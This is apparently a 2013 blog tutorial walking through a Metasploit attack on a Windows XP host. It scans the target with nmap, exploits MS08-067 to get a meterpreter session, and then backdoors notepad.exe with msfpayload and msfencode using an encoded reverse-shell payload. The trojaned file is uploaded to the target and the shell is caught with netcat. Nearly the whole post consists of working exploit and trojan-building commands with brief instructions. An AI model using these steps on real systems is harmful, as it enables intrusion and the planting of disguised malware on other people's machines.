Pages - Menu

Senin, 04 Februari 2013

Transfering Crafted File


For the first time, we must make the process Information Gathering to find out what ports are open on the target/
Do this by typing the command # nmap-sV 192.158.56.101


From the information above, we know that the target using the Windows XP operating system with port 445
Before open #msfconsole
after we know Information Gathering, then we do Service Enumeration.

This time we will use the smb module, because smb module is one module vulnerabilty on windows
type the command #search smb

Type the command #use exploit/windows/smb/ms08_067_netapi to iturn on the module.
Next step set the payload. Before we must show payload with the command #show payload

Now we will use a meterpreter bind tpc payload. Type a command 
#set payload windows/meterpreter/bind_tcp

After that, we must set RHOS <IP Target>
#set RHOST 192.168.56.101
and then, type a command #show options to see

OK, so far we success to set the RHOST.
Next step, set the target. Type the command #set Target 0
After that, type #exploit
like Show

So far, we success exploit Windows Xp with the Meterpreter Payload.

Now we try to learn how to make file contain payload inside of it using msfpayload, before we discuss it, better we know the different about bind and reverse payload.

This time we'll injection in a notepad file. That when the target is open notepad, our payload will be run.
For the first step, download notepad.exe on meterpreter

ype a command root@bt:/opt/metasploit/msf3# msfencode -l to encode

Downloading Success, next we must injection notepad.exe. Type a command
#msfpayload <setpayload> <set RHOST/LHOST> <RPORT/LPORT> R |
msfencode -t exe -x <file_to_crafted> -o <set_path> -e <set_encode> -c 65

#msfpayload windows/shell_reverse_tcp LHOST=192.168.56.1 LPORT=1234 R | msfencode -t exe -x /home/notepad.exe -o /home/notepadHasil.exe -e x86/shikata_ga_nai -k -c 5

Make sure we are in the directory that we will put the  file crafted. Type the command #pwd
Now, let's upload a crafted file to target.
#upload /home/notepadHasil.exe C:\ 

Run a Notepad on computer target, and let's try NC


And, Successfully ...

Good Luck for your try Harder !!!

Tidak ada komentar:

Posting Komentar